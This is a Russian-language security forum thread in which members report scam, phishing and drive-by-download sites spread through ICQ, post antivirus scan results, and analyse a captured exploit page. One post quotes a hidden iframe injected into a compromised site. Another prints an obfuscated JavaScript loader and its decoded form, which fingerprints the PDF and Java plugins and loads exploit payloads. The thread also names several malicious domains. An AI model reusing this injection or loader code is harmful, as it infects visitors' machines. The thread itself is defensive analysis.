Printable View
Пришло через ICQ (Стоило всего лишь выставить, что я живу в России)
[quote]Мне Оля сайт скинула, а я не разбираюсь платный он или нет (((( помоги плз!!!! Алька.
:http:inparadise.org.ru[/quote]
Кто нибудь, разберитесь... "платный он или нет" :L
Естессно, ни с какими Альками я не знаком :)
[QUOTE=Lexxus;498912]Пришло через ICQ (Стоило всего лишь выставить, что я живу в России)
Кто нибудь, разберитесь... "платный он или нет" :L
Естессно, ни с какими Альками я не знаком :)[/QUOTE]
Ссылка на якобы порносайт (ничего зловредного там нет) - только фишинг:
[QUOTE]ВВЕДИ СВОЙ НОМЕР ТЕЛЕФОНА
ЧТОБЫ ПОЛУЧИТЬ ДОСТУП
КАЧАЙ ВИДЕО 24 ЧАСА БЕСПЛАТНО ПРЯМО СЕЙЧАС
Вводите свой реальный номер телефона, на него придёт бесплатная смс с кодом доступа.[/QUOTE]
[QUOTE]ВНИМАНИЕ! Для отмены подписки отправьте слово STOP на:
для абонентов МТС - номер 770640 (бесплатно)
для абонентов других операторов - номер 4440 (стоимость сообщения около 1,5 рублей)[/QUOTE]
[QUOTE]В случае проблем с подпиской
звоните на номер: 88003339008[/QUOTE]
Похоже очередной развод какой-то... :)
[url]http://smscost.ru/number/770640[/url]
[url]http://smscost.ru/number/4440[/url]
Вот описание сути этого лохотрона:
[url]http://forums.drom.ru/habarovsk/t1151264796.html[/url]
[QUOTE='Lexxus;498912']Естессно, ни с какими Альками я не знаком [/QUOTE]О мне от этой Альки стока всякого гавна в аську лезит.
Вот очередная подборка сайтов с эксплойтами:
:http:arxivblog.com
Результат на VT:
[url]http://www.virustotal.com/ru/analisis/0c6a70ef870b3282f2015a0a3f3fbcad8f95141dda7290d0e1dba78c0a8874f7-1257264118[/url]
:http:dom0cn.cn/arend_13/index.php?spl=2
Результат на VT:
[url]http://www.virustotal.com/ru/analisis/d807ca4b480a613535afd96e681b86297fd27e8bd7a8eb02ff5be1ccb666a456-1257265605[/url]
:http:agofa.cn/x150/xx.html
Результат на VT:
[url]http://www.virustotal.com/ru/analisis/f3a660e53dd06e3977359c3845b60d3ff0d78775f7edddcd032dbaa3a877fc97-1257266411[/url]
По последнему адресу, у меня немного другие результаты - G data движок B (Avast)
[QUOTE]1
Вирус: HTML:IFrame-CR [Trj] (Engine B)
Была попытка получить доступ к зараженному
файлу.
Файл: arxivblog_com[1].txt
Список: C:\Documents and Settings\Valera\Local Settings\Temporary Internet Files\Content.IE5\XXD7INS0
Вирус: Trojan.Generic.IS.554547 (Engine A)
Была попытка получить доступ к зараженному
файлу.
Файл: flash[1].swf
Список: C:\Documents and Settings\Valera\Local Settings\Temporary Internet Files\Content.IE5\CW1NBVBO
2
Вирус: JS:Downloader-FQ [Expl] (Engine B)
Была попытка получить доступ к зараженному
файлу.
Файл: index[1].htm
Список: C:\Documents and Settings\Valera\Local Settings\Temporary Internet Files\Content.IE5\LBTINRA6
3
Вирус: JS:MalHead-BX [Trj] (Engine B)
Была попытка получить доступ к зараженному
файлу.
Файл: ytfl1[1].htm
Список: C:\Documents and Settings\Valera\Local Settings\Temporary Internet Files\Content.IE5\OT4QY6BH
Вирус: JS:Downloader-AB [Trj] (Engine B)
Была попытка получить доступ к зараженному
файлу.
Файл: x1[1].htm
Список: C:\Documents and Settings\Valera\Local Settings\Temporary Internet Files\Content.IE5\S62HOV29[/QUOTE]
Вот по всем адресам))
[QUOTE=Rampant;500082]По последнему адресу, у меня немного другие результаты - G data движок B (Avast)[/QUOTE]
Иногда такое бывает, антивири на VT не детектят, а на ПК детектят - может в настройках дело или в базах - тем более на VT я залил расшифрованный скрипт, а в зашифрованном виде (в котором он лежит на сайте) - на VT его вообще почти никто не детектит:
[url]http://www.virustotal.com/ru/analisis/c8a40985dd1c5ee4a1d3ceb4667f15ede512504c6087518750710c47378c7c50-1257268660[/url]
по адресу
:http:domlustr.ru/katalogi/Reccagni_Angelo_2009/general.htm?index.htm
инжектирован код
[HTML]<div style="display:none">enkkohdqplucsinvfagdegrvtmfenxu<iframe width=694 height=444 src="http://age-t./деактив/ru:8080/index.php" ></iframe></div></td>
[/HTML]
еще сегодня в обед отдавал зараженный пдф /уязвимость в акробате/, (увы отловить саму пдф не успел) устанавливалось (по класификации дрвэб)
Trojan.DownLoad.44006
Trojan.Click.29425
Trojan.Proxy.6207
Trojan.Packed.684
Trojan.Botnetlog.11
:D
и под конец
Trojan.Winlock.425 //спрашивается нафига лочить курочку ;)
увы мне сейчас вообще ничего не дает., просто завершает соединение >:(.
ЗЫ кстати все это безобразие под ограниченной учетной записью ничего не испоганило, просто умудрилось загрузить 4х процессорную систему на 100%, что и послужило поводом для проверки.
Мне тоже ничё не дают, пробовал от себя и из Германии :(
G data сразу блочит.
[URL=http://radikal.ru/F/s44.radikal.ru/i105/0911/3b/6befe9df36a3.jpg.html][IMG]http://s44.radikal.ru/i105/0911/3b/6befe9df36a3t.jpg[/IMG][/URL]
есть, поймал с зловредного сайта данные ;). отдает как-то странно толи с каждого ип раз в сутки толи еще как...
кто может разберитесь, //за 100% достоверность не отвечаю ибо фильтры контента могли его малость погрызть :(.\
[CODE]
<html>
<head><title>Jweah13faem0ja6dqj342n53hzg6</title></head><body>
<script>
eval( function(p, a,
c, k , e , d )
{e = function
(
c
)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('w k(){h{5=\'<#&(i&^!$f(#)r@a!m(!e^@$\'.3(/@|#|&|\\^|\\!|\\)|\\$|\\(/2,\'\');7=\'<@@!/&i@#f&@(r#$a^^m^e$()^>(\'.3(/@|\\$|\\)|\\^|\\(|&|#|\\!/2,\'\');j=\'A$@d&o&!(@b(^#e@ @@A&&c#!(r#o!&&b)@$a^$t&\'.3(/\\^|\\(|&|@|\\!|\\$|\\)|#/2,\'\');8=\'A@)#)d$o)b^e$ #()z#D#$&@F@\'.3(/@|\\^|\\(|\\$|&|\\)|#|\\!/2,\'\');y(i=0;i<6.v.x;i++){4=6.v[i].B;l((4.g(j)!=-1)||(4.g(8)!=-1)){n.p(5+\' q="s/G.C">\'+7)}}}u(9){}h{l(6.H()){n.p(5+\' q="s/E.I">\'+7)}}u(9){}}k();',45,45,'||ig|replace|B53fjjdpq|Wvfl219id|navigator|Iqqptmy|Icih2owkj|L3kv2n8|||||||indexOf|try||Umsjv5|B4fkcsqef|if||document||write|src||pics||catch|plugins|function|length|for|P||name|pdf||java||ChangeLog|javaEnabled|html'.split('|'),0,{}))
</script>
</body>
</html>
[/CODE]
[QUOTE=Virtual;504447]есть, поймал с зловредного сайта данные ;). [/QUOTE]
Что то выполняется и куда то записывается вроде ;)
[CODE]function B4fkcsqef(){try{Wvfl219id='<#&(i&^!$f(#)r@a!m(!e^@$'.replace(/@|#|&|\^|\!|\)|\$|\(/ig,'');Iqqptmy='<@@!/&i@#f&@(r#$a^^m^e$()^>('.replace(/@|\$|\)|\^|\(|&|#|\!/ig,'');Umsjv5='A$@d&o&!(@b(^#e@ @@A&&c#!(r#o!&&b)@$a^$t&'.replace(/\^|\(|&|@|\!|\$|\)|#/ig,'');Icih2owkj='A@)#)d$o)b^e$ #()P#D#$&@F@'.replace(/@|\^|\(|\$|&|\)|#|\!/ig,'');for(i=0;i<navigator.plugins.length;i++){B53fjjdpq=navigator.plugins[i].name;if((B53fjjdpq.indexOf(Umsjv5)!=-1)||(B53fjjdpq.indexOf(Icih2owkj)!=-1)){document.write(Wvfl219id+' src="pics/ChangeLog.pdf">'+Iqqptmy)}}}catch(L3kv2n8){}try{if(navigator.javaEnabled()){document.write(Wvfl219id+' src="pics/java.html">'+Iqqptmy)}}catch(L3kv2n8){}}B4fkcsqef();[/CODE]
а понятно здесь один pdf эксплоит впаривают, второй java.html не знаю что может быть
большое, человеческое спасибо. все понятно, все скачал, ща разбираюсь.
вот хитрые заразы ;) если есть ява то и грузят ее, если есть плагин пдф, то аналогично.
[QUOTE]второй java.html не знаю что может быть[/QUOTE]
там ява аплет с эксплойтом ;), грузится по критической ошибке с пдф.
ЗЫ пойду-ка дрвэбу скормлю прямые линки на зловредов, пусть себе в черные списки добавют :).
добавлено.... дрвэб кричат что все чисто ;). бум писать в сапорт
[size="1"][color="#666686"][B][I]Добавлено через 1 час 38 минут[/I][/B][/color][/size]
у вы результаты неутешительные :(
по пдф
всего 5 продуктов опознало
[url]http://www.virustotal.com/ru/analisis/40622e189bf837a0eabdd19ddd123e966b1b3bd9eb1309421037fce2aee9d547-1257759647[/url]
по ява аплету :( 0!!!
[url]http://www.virustotal.com/ru/analisis/dc6e8866d15e29f173efd4f877d3a73d4f005bf50ec951501277d54676e53f77-1257759773[/url]
...
сегодня на пдф уже 10 из 37 жалуются, а ДрВэб как всегда в конце планеты ;)
[url]http://www.virustotal.com/ru/analisis/40622e189bf837a0eabdd19ddd123e966b1b3bd9eb1309421037fce2aee9d547-1257832469[/url]
А мы продолжаем:
[QUOTE]Привет, вот сайт :http:totalcontroller.ru можно прочитать чужие СМС, посмотреть кто звонил, а главное что все работает, проверено мной :-)
[/QUOTE]
Пришло в азю
Взгляните пожалуйста на данный сайт:
_www.mylolita.ru
Рекламируют фото откровенного характера, а так же возможность шпионить за сотовым телефоном или что-то в этом роде.
Обычный стандартный лохотрон, очень популярен в последнее время.
[QUOTE=Kornev;515330]Взгляните пожалуйста на данный сайт:
_www.mylolita.ru
Рекламируют фото откровенного характера, а так же возможность шпионить за сотовым телефоном или что-то в этом роде.[/QUOTE]
Забавно :)
[QUOTE=Kornev;515330]Взгляните пожалуйста на данный сайт:
_www.mylolita.ru
Рекламируют фото откровенного характера, а так же возможность шпионить за сотовым телефоном или что-то в этом роде.[/QUOTE]
Сейчас там уже сайт секс знакомств :L шустрые ребята ...
[url]http://podrobnosti.ua/podrobnosti/2009/11/30/647940.html[/url]
можно ли читать чужие смс :)
от 3х до 7 лет в Украине дают :) ну, если поймают
Ну очень НАВЯЗЧИВЫЙ сайт :)
:http:stiratel.ru/promos/6/?adv=120
Пытаются впарить нечто с расширением exe ;)
[QUOTE=wowka;523963]Ну очень НАВЯЗЧИВЫЙ сайт :)
пытаются впарить нечто с расширением exe ;)[/QUOTE]
[URL="http://img512.imageshack.us/img512/7656/st2s.png"][IMG]http://img512.imageshack.us/img512/7656/st2s.th.png[/IMG][/URL] [URL="http://img692.imageshack.us/img692/1948/st3.png"][IMG]http://img692.imageshack.us/img692/1948/st3.th.png[/IMG][/URL]
[URL]http://www.virustotal.com/analisis/8821fdc423307510c8605a7a8e81fbd0ed8457c995a7dca8c70eae83dd31ad8d-1259829847[/URL]
[URL]http://www.virustotal.com/analisis/42ce94d63ff9f9554ef59330e6301b0d99fbdcca4d0f4a03970fa44ead154c31-1259829878[/URL]
[URL]http://www.virustotal.com/analisis/041c3fb0c060b6193f09e8e55a8f55af1111464edb3dd9a8f873753709ac0228-1259830513[/URL]
Полазил ещё раз по нему
[QUOTE]Отличная программа. Я пользуюсь Стирателем и мой тупой начальник не видит, на каких сайтах я сижу в рабочее время"
Василий, Москва
"Я забыл выйти из контакта и моя подружка прочитала мои сообщения. В этот раз пронесло. Я поставил Стиратель и теперь такая ситуация не повторится"
Максим, Самара
"В моем отделе проводили проверку компьютеров. У двоих менеджеров нашли следы посещения фишек и порнушки. Их уволили. А мой комп оказался чистым. Спасибо за Стиратель, не ожидал!"
Иван, Санкт-Петербург[/QUOTE]
:mosking: